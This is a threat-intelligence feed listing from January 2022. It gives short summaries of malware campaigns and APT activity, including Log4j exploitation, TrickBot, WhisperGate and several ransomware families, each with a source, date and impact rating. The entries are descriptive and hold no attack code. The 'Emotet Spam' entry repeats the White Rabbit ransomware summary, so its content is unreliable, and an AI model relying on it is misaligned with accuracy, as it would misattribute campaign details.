- Blackberry Research team have discovered an correlating attack by Prophet Spider group with exploitation of Log4j vulnerability in VMware Horizon. Researchers also claimed to have spotted Propjer Spider TTPs as sell network access to other criminals including ransomware gangs. Despite VMware's patch and subsequent guidance many implementations remain unpatched leaving them susceptible to exploitation.
Log4j 4 IP's
HIGH
+
—
- Intel Source:
- Internal
- Intel Name:
- Log4j 4 IP's
- Date of Scan:
- 2022-01-31
- Impact:
- HIGH
- Summary:
- IP address linked to Log4j vulnerability
KONNI RAT
HIGH
+
—
- Intel Source:
- MalwareBytes
- Intel Name:
- KONNI RAT
- Date of Scan:
- 2022-01-31
- Impact:
- HIGH
- Summary:
- KONNI is a Remote Administration Tool that has being used for at least 8 years. The North Korean threat actor that is using this piece of malware has being identified under the Kimsuky umbrella. KONNI Rat is being actively developed and new samples are now including significant updates.
Analysis of a Management IP Address linked to Molerats APT
MEDIUM
+
—
- Intel Source:
- Team Cymru
- Intel Name:
- Analysis of a Management IP Address linked to Molerats APT
- Date of Scan:
- 2022-01-28
- Impact:
- MEDIUM
- Summary:
- Team Cymru have analysed management of IP addresses which were linked to Molerats APT. These were higher order infrastructure utilizing IP addresses assigned to Palestinian providers. Additionally the targets identified were Israel and Saudi Arabia.
Midas Ransomware
MEDIUM
+
—
- Intel Source:
- Sophos
- Intel Name:
- Midas Ransomware
- Date of Scan:
- 2022-01-28
- Impact:
- MEDIUM
- Summary:
- An attack on technology vendor was identified and the ransomware behind it was Midas. Midas Ransomware Attack Highlights the Risks of Limited Access Controls and “Ghost” Tools. The attackers were able to spend nearly two months undetected in a target's environment.
AsyncRAT
MEDIUM
+
—
- Intel Source:
- Morphisec
- Intel Name:
- AsyncRAT
- Date of Scan:
- 2022-01-28
- Impact:
- MEDIUM
- Summary:
- Morphisec researchers have identified a new sophisticated campaign delivery evading multiple AVs. Through a simple email phishing tactic with an html attachment threat attackers are delivering AsyncRAT (a remote access trojan) designed to remotely monitor and control its infected computers through a secure encrypted connection.
TrickBot Invoices
HIGH
+
—
- Intel Source:
- Cofense
- Intel Name:
- TrickBot Invoices
- Date of Scan:
- 2022-01-27
- Impact:
- HIGH
- Summary:
- In the new campaign TrickBot is taking advantage of supply chain delays and sending the phishing emails to users with an invoice attachment claiming to be from USPS. This TrickBot campaign demonstrates more effort than past campaigns relative to design and more in the email itself. Most of the time the style for TrickBot campaign emails is relatively simple and can be easily spotted as suspicious.
DazzleSpy macOS malware
MEDIUM
+
—
- Intel Source:
- WeLiveSecurity
- Intel Name:
- DazzleSpy macOS malware
- Date of Scan:
- 2022-01-27
- Impact:
- MEDIUM
- Summary:
- ESET rersearchers discovered a new watering hole attack targeting macOS users and visitors of a pro-democracy radio station website in Hong Kong and infecting them with the DazzleSpy malware.
WhisperGate TTP_Seeder Queries
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- WhisperGate TTP_Seeder Queries
- Date of Scan:
- 2022-01-26
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
PKEXEC LPE/CVE-2021-4034_Seeder Queries
MEDIUM
+
—
- Intel Source:
- STR
- Intel Name:
- PKEXEC LPE/CVE-2021-4034_Seeder Queries
- Date of Scan:
- 2022-01-26
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
APT36/Earth Karkaddan
HIGH
+
—
- Intel Source:
- Trend Micro
- Intel Name:
- APT36/Earth Karkaddan
- Date of Scan:
- 2022-01-25
- Impact:
- HIGH
- Summary:
- According to Trend Micro researchers the suspected Pakistani threat actor group APT36 aka Earth Karkaddan has expanded its malware arsenal by adding a new Android Rat malware -CapraRAT.
Trickbot's new evasion technique
HIGH
+
—
- Intel Source:
- IBM
- Intel Name:
- Trickbot's new evasion technique
- Date of Scan:
- 2022-01-25
- Impact:
- HIGH
- Summary:
- As per securityintelligence researchers TrickBot operators have been escalating activity. As part of that escalation malware injections have been fitted with added protection to keep researchers out and get through security controls.
OceanLotus APT attack
HIGH
+
—
- Intel Source:
- QI-ANXIN Threat Intelligence Center
- Intel Name:
- OceanLotus APT attack
- Date of Scan:
- 2022-01-25
- Impact:
- HIGH
- Summary:
- The state-sponsored threat actor group known as OceanLotus is using the web archive file format to evade system detection while delivering backdoors for intrusion. A report from QI-ANXIN Threat Intelligence Center claims that OceanLotus’s campaign is actively using web archive files (.MHT and .MHTML) for its attacks.
STRRAT Malware
MEDIUM
+
—
- Intel Source:
- Fortinet
- Intel Name:
- STRRAT Malware
- Date of Scan:
- 2022-01-25
- Impact:
- MEDIUM
- Summary:
- Researchers at Fortinet has identified an email which was subsequently found to harbor a variant of the STRRAT malware as an attachment. STRRAT is a multi-capability Remote Access Trojan that dates to at least mid-2020. Unusually it is Java-based and is typically delivered via phishing email to victims.
BRATA RAT malware
MEDIUM
+
—
- Intel Source:
- Cleafy Labs
- Intel Name:
- BRATA RAT malware
- Date of Scan:
- 2022-01-25
- Impact:
- MEDIUM
- Summary:
- Researchers from Cleafy have tracked BRATA malware and have documented its evolution in terms of both new targets and new features.
Infected PowerPoint Files Using Cloud Services to Deliver Multiple Malware
MEDIUM
+
—
- Intel Source:
- Netskope
- Intel Name:
- Infected PowerPoint Files Using Cloud Services to Deliver Multiple Malware
- Date of Scan:
- 2022-01-25
- Impact:
- MEDIUM
- Summary:
- Researchers at Netspoke has identified an increase in the usage of one specific file type from the Microsoft Office suite: PowerPoint. These relatively small files are being delivered through phishing emails then downloading and executing malicious scripts through LoLBins a common technique often used to stay under the radar.
FIN7 trojanized USB
HIGH
+
—
- Intel Source:
- Gemini Advisory
- Intel Name:
- FIN7 trojanized USB
- Date of Scan:
- 2022-01-24
- Impact:
- HIGH
- Summary:
- Geminiadvisory researchers found FIN7 group using flash drives to Spread Remote Access Trojan. It uses the trojanized USB devices to ultimately load the IceBot Remote Access Trojan (RAT) resulting in FIN7 gaining unauthorized remote access to systems within victims’ networks.
MoonBounce Implant_Seeder Queries
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- MoonBounce Implant_Seeder Queries
- Date of Scan:
- 2022-01-24
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
AIKIDO C2_Seeder Queries - 24/01/2022
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- AIKIDO C2_Seeder Queries - 24/01/2022
- Date of Scan:
- 2022-01-24
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
DDoS IRC Bot Malware
LOW
+
—
- Intel Source:
- ASEC
- Intel Name:
- DDoS IRC Bot Malware
- Date of Scan:
- 2022-01-24
- Impact:
- LOW
- Summary:
- ASEC Research Team has discovered that DDoS IRC Bot strains disguised as adult games are being installed via webhards. Webhards are platforms commonly used for the distribution of malware in Korea where njRAT and UDP Rat were distributed in the past.
Emotet Spam
HIGH
+
—
- Intel Source:
- Trend Micro
- Intel Name:
- Emotet Spam
- Date of Scan:
- 2022-01-24
- Impact:
- HIGH
- Summary:
- Trend Micro research team spotted the new ransomware family named 'White Rabbit' which discretely making a name for itself by executing an attack on a local US bank in December 2021. The ransomware copies the hiding capability from Egregor and carries a potential connection to the APT group FIN8.
Molerats APT Espionage campaign
HIGH
+
—
- Intel Source:
- Zscaler
- Intel Name:
- Molerats APT Espionage campaign
- Date of Scan:
- 2022-01-24
- Impact:
- HIGH
- Summary:
- Zscaler ThreatLabz team have detected several samples of macro-based MS office files uploaded from Middle Eastern countries. These files contained decoy themes related to geo-political conflicts between Israel and Palestine. Such themes have been used in previous attack campaigns waged by the Molerats APT.
DTPacker
MEDIUM
+
—
- Intel Source:
- Proofpoint
- Intel Name:
- DTPacker
- Date of Scan:
- 2022-01-24
- Impact:
- MEDIUM
- Summary:
- Researchers at Proofoint has identified a malware packer which researchers have dubbed as 'DTPacker'. The malware is typically used to pack remote access trojans that can be used to steal information and load follow-on payloads such as ransomware.
DoL Phishing
MEDIUM
+
—
- Intel Source:
- INKY
- Intel Name:
- DoL Phishing
- Date of Scan:
- 2022-01-21
- Impact:
- MEDIUM
- Summary:
- Researchers at INKY has detected phishing campaign that impersonated the United States Department of Labor (DoL). In this campaign the majority of phishing attempts had sender email addresses spoofed to look as if they came from [email protected][.]gov which is the real DoL site. A small subset was spoofed to look as if they came from [email protected][.]com which is of course not the real DoL domain.
DONOT Hacking team/APT-C-35/SectorE02
MEDIUM
+
—
- Intel Source:
- WeLiveSecurity
- Intel Name:
- DONOT Hacking team/APT-C-35/SectorE02
- Date of Scan:
- 2022-01-21
- Impact:
- MEDIUM
- Summary:
- ESET researchers take a deep look into recent attacks carried out by Donot Team throughout 2020 and 2021 targeting government and military entities in several South Asian countries.
Mirai Botnet Abusing Log4j
HIGH
+
—
- Intel Source:
- Akamai
- Intel Name:
- Mirai Botnet Abusing Log4j
- Date of Scan:
- 2022-01-21
- Impact:
- HIGH
- Summary:
- Researchers at Akamai has examined a ARM binary which revealed the adaptation of Log4j vulnerability to infect and assist in the proliferation of malware used by the Mirai botnet.
BHUNT Stealer
MEDIUM
+
—
- Intel Source:
- BitDefender
- Intel Name:
- BHUNT Stealer
- Date of Scan:
- 2022-01-21
- Impact:
- MEDIUM
- Summary:
- Bitdefender researchers have discovered a new family of crypto-wallet stealer malware dubbed as 'BHUNT'. The samples identified appear to have been digitally signed with a digital certificate issued to a software company but the digital certificate does not match the binaries.
Targeted ICS Spyware
MEDIUM
+
—
- Intel Source:
- Kaspersky
- Intel Name:
- Targeted ICS Spyware
- Date of Scan:
- 2022-01-20
- Impact:
- MEDIUM
- Summary:
- Kaspersky ICS Experts have noticed a large set of campaigns that spread from one industrial enterprise to another via hard-to-detect phishing emails disguised as the victim organizations’ correspondence and abusing their corporate email systems to attack through the contact lists of compromised mailboxes.
Operation Bleeding Bear
HIGH
+
—
- Intel Source:
- Elastic
- Intel Name:
- Operation Bleeding Bear
- Date of Scan:
- 2022-01-20
- Impact:
- HIGH
- Summary:
- Researchers at Elastic Security provides new analysis and insights into targeted campaign against Ukraine organizations with destructive malware. In a multi-staged attack one malware component known as WhisperGate utilizes a wiping capability on the Master Boot Record (MBR) making any machine impacted inoperable after boot-up.
MoonBounce
HIGH
+
—
- Intel Source:
- Kaspersky
- Intel Name:
- MoonBounce
- Date of Scan:
- 2022-01-20
- Impact:
- HIGH
- Summary:
- Kaspersky Researchers has identified a UEFI firmware-level compromise which Researchers further analysed and detected that a single component within the inspected firmware’s image was modified by attackers in a way that allowed them to intercept the original execution flow of the machine’s boot sequence and introduce a sophisticated infection chain.
White Rabbit Ransomware
MEDIUM
+
—
- Intel Source:
- Trend Micro
- Intel Name:
- White Rabbit Ransomware
- Date of Scan:
- 2022-01-20
- Impact:
- MEDIUM
- Summary:
- Trend Micro research team spotted the new ransomware family named 'White Rabbit' which discretely making a name for itself by executing an attack on a local US bank in December 2021. The ransomware copies the hiding capability from Egregor and carries a potential connection to the APT group FIN8.
Blackcat Ransomware
MEDIUM
+
—
- Intel Source:
- SentinelOne
- Intel Name:
- Blackcat Ransomware
- Date of Scan:
- 2022-01-20
- Impact:
- MEDIUM
- Summary:
- Researchers at SentinelOne analysing BlackCat Ransomware behaviour. BlackCat first appeared in late November 2021 and has reportedly been attacking targets in multiple countries including Australia India and the U.S and demanding ransoms in the region of $400 000 to $3 000 000 in Bitcoin or Monero.
WhisperGate
HIGH
+
—
- Intel Source:
- Microsoft
- Intel Name:
- WhisperGate
- Date of Scan:
- 2022-01-20
- Impact:
- HIGH
- Summary:
- MSTIC found a destructive malware operation which have been targeting organaizations in UKraine. The malware has been dubbed as WhisperGate. The activity has been identified as possible Master Boot Records (MBR) Wiper activity.
vSphere cryptominer campaign
MEDIUM
+
—
- Intel Source:
- Uptycs
- Intel Name:
- vSphere cryptominer campaign
- Date of Scan:
- 2022-01-19
- Impact:
- MEDIUM
- Summary:
- Researchers from Uptycs identified some malicious shell scripts which specifically targets VMware vSphere. The attackers have used certain commands in the shell script to modify the vSphere service in order to run the Xmrig miner.
SysJoker_Seeder Queries - 12/01/2022
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- SysJoker_Seeder Queries - 12/01/2022
- Date of Scan:
- 2022-01-19
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
AIKIDO C2_Seeder Queries - 18/01/2022
MEDIUM
+
—
- Intel Source:
- STR
- Intel Name:
- AIKIDO C2_Seeder Queries - 18/01/2022
- Date of Scan:
- 2022-01-19
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
AIKIDO ICEID New Delivery Method_Seeder Queries - 12/01/2022
MEDIUM
+
—
- Intel Source:
- STR
- Intel Name:
- AIKIDO ICEID New Delivery Method_Seeder Queries - 12/01/2022
- Date of Scan:
- 2022-01-19
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
(Mailbox Phishing Kit)Espionage campaign- Renewable energy companies
MEDIUM
+
—
- Intel Source:
- Bushidotoken
- Intel Name:
- (Mailbox Phishing Kit)Espionage campaign- Renewable energy companies
- Date of Scan:
- 2022-01-19
- Impact:
- MEDIUM
- Summary:
- A security researcher discovered a large-scale cyber-espionage campaign targeting primarily renewable energy and industrial technology organization. The attacker uses a custom 'Mail Box' toolkit an unsophisticated phishing package deployed on the actors' infrastructure as well as legitimate websites compromised to host phishing pages.
MuddyWater_MOIS_Seeder Queries - 14/01/2022
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- MuddyWater_MOIS_Seeder Queries - 14/01/2022
- Date of Scan:
- 2022-01-18
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
BlueNoroff APT Group
HIGH
+
—
- Intel Source:
- Kaspersky
- Intel Name:
- BlueNoroff APT Group
- Date of Scan:
- 2022-01-14
- Impact:
- HIGH
- Summary:
- The North Korea-linked APT group BlueNoroff has been spotted targeting cryptocurrency startups with fake MetaMask browser extensions. The latest attacks targeted cryptocurrency startups in the US Russia China India the UK Ukraine Poland Czech Republic UAE Singapore Estonia Vietnam Malta Germany and Hong Kong.
Exploit Kits vs Chrome
MEDIUM
+
—
- Intel Source:
- Avast
- Intel Name:
- Exploit Kits vs Chrome
- Date of Scan:
- 2022-01-13
- Impact:
- MEDIUM
- Summary:
- Avast researchers found Underminer exploit kit developed an exploit for the Chromium based vulnerability.There were two exploit kits that dared to attack Google Chrome: Magnitude using CVE-2021-21224 and CVE-2021-31956 and Underminer using CVE-2021-21224 CVE-2019-0808 CVE-2020-1020 and CVE-2020-1054.
TellYouThePass Ransomware
HIGH
+
—
- Intel Source:
- CrowdStrike
- Intel Name:
- TellYouThePass Ransomware
- Date of Scan:
- 2022-01-13
- Impact:
- HIGH
- Summary:
- Crowdstrike found re-emerged version of TellYouThePass ransomware compiled using golang. The same ransomware was recently associated with Log4Shell post-exploitation targeting Windows and Linux.
Magniber Ransomware
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber Ransomware
- Date of Scan:
- 2022-01-13
- Impact:
- MEDIUM
- Summary:
- Analysts from ahnlab discovered that attackers behind the Magniber ransomware who have been exploiting IE-based vulnerabilities so far are now targeting PCs via modern browsers such as Edge and Chrome.
Abusing MS Office Using Malicious Web Archive Files
MEDIUM
+
—
- Intel Source:
- Netskope
- Intel Name:
- Abusing MS Office Using Malicious Web Archive Files
- Date of Scan:
- 2022-01-13
- Impact:
- MEDIUM
- Summary:
- The OceanLotus group of state-sponsored hackers are now using the web archive file format (.MHT and .MHTML) to deploy backdoors to compromised systems.
DEV-0401
MEDIUM
+
—
- Intel Source:
- Microsoft
- Intel Name:
- DEV-0401
- Date of Scan:
- 2022-01-13
- Impact:
- MEDIUM
- Summary:
- Microsoft Threat Intelligence Center has detected an activity from attackers where they started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. These attacks are performed by a China-based ransomware operator that they tracking as DEV-0401.
MuddyWater_MOIS
HIGH
+
—
- Intel Source:
- US cyber command
- Intel Name:
- MuddyWater_MOIS
- Date of Scan:
- 2022-01-13
- Impact:
- HIGH
- Summary:
- U.S. Cyber Command’s Cyber National Mission Force (CNMF) has identified multiple open-source tools used by an Iranian advanced persistent threat (APT) group known as MuddyWater. The techniques used by the APT group includes side-loading DLLs in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions.
GootLoader Campaign
MEDIUM
+
—
- Intel Source:
- eSentire
- Intel Name:
- GootLoader Campaign
- Date of Scan:
- 2022-01-13
- Impact:
- MEDIUM
- Summary:
- Esentire researchers found that Operators of the GootLoader campaign are targeting employees of accounting and law firms. GootLoader is a stealthy initial access malware which after getting a foothold into the victim's computer system infects the system with ransomware or other lethal malware.
Patchwork APT
LOW
+
—
- Intel Source:
- MalwareBytes
- Intel Name:
- Patchwork APT
- Date of Scan:
- 2022-01-12
- Impact:
- LOW
- Summary:
- MalwareBytes labs has analysed a campaign where Patchwork APT has used malicious RTF files to drop a variant of the BADNEWS Remote Administration Trojan (RAT).
RedLine Stealer
MEDIUM
+
—
- Intel Source:
- Fortinet
- Intel Name:
- RedLine Stealer
- Date of Scan:
- 2022-01-12
- Impact:
- MEDIUM
- Summary:
- Researchers at Fortinet has identified an executable file 'Omicron Stats.exe' which attributed to be a variant of RedLine Stealer malware. Researchers has analysed Redline new variant its core functions how it communicates with its C2 server and how organizations can protect themselves.
Nanocore Netwire and AsyncRAT
HIGH
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Nanocore Netwire and AsyncRAT
- Date of Scan:
- 2022-01-12
- Impact:
- HIGH
- Summary:
- Cisco Talos researchers discovered new attacks Campaign Using Public Cloud Infrastructure to Spread RATs those RATs are Nanocore Netwire and AsyncRATs.
ABCbot
LOW
+
—
- Intel Source:
- Cado security
- Intel Name:
- ABCbot
- Date of Scan:
- 2022-01-12
- Impact:
- LOW
- Summary:
- Cadosecurity researchers analyzed Abcbot and found its link with Xanthe based cryptojcaking campaign. Same threat actor is responsible for both Xanthe and Abcbot and is shifting its objective from mining cryptocurrency on compromised hosts to activities more traditionally associated with botnets such as DDoS attacks.
STR Omega 1/12/22
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- STR Omega 1/12/22
- Date of Scan:
- 2022-01-12
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
APT35
HIGH
+
—
- Intel Source:
- Checkpoint
- Intel Name:
- APT35
- Date of Scan:
- 2022-01-11
- Impact:
- HIGH
- Summary:
- CheckPoint researchers discovered that APT35 have started widespread scanning and attempts to leverage Log4j flaw in publicly facing systems.
SysJoker Backdoor
HIGH
+
—
- Intel Source:
- Intezer
- Intel Name:
- SysJoker Backdoor
- Date of Scan:
- 2022-01-11
- Impact:
- HIGH
- Summary:
- Researchers from Intezer discovered a new ulti-platform backdoor that targets Windows Mac and Linux. The backdoor was named as SysJoker. SysJoker masquerades as a system update and generates its C2 by decoding a string retrieved from a text file hosted on Google Drive.
Trojanized dnspy app campaign
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- Trojanized dnspy app campaign
- Date of Scan:
- 2022-01-11
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
VMware Horizon Exploitation Using Log4J
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- VMware Horizon Exploitation Using Log4J
- Date of Scan:
- 2022-01-11
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
TA551 IcedID
MEDIUM
+
—
- Intel Source:
- Palo Alto
- Intel Name:
- TA551 IcedID
- Date of Scan:
- 2022-01-06
- Impact:
- MEDIUM
- Summary:
- Palo Alto Unit42 Researchers has tracked TA551 activity where threat actor using Word documents with both German templates and Italian templates. Later deliverying IcedID malware.
Web Skimmer Campaign
MEDIUM
+
—
- Intel Source:
- Palo Alto
- Intel Name:
- Web Skimmer Campaign
- Date of Scan:
- 2022-01-06
- Impact:
- MEDIUM
- Summary:
- Researchers at Unit42 has found a supply chain attack leveraging a cloud video platform to distribute skimmer (aka formjacking) campaigns. In skimmer attacks cybercriminals inject malicious JavaScript code to hack a website and take over the functionality of the site’s HTML form page to collect sensitive user information.
Zloader Banking Malware Campaign
MEDIUM
+
—
- Intel Source:
- Checkpoint
- Intel Name:
- Zloader Banking Malware Campaign
- Date of Scan:
- 2022-01-05
- Impact:
- MEDIUM
- Summary:
- Checkpoint Research Team tracking Zloader campaign and identified an evidence of the new campaign was first seen around early November 2021. The techniques incorporated in the infection chain include the use of legitimate remote management software (RMM) to gain initial access to the target machine.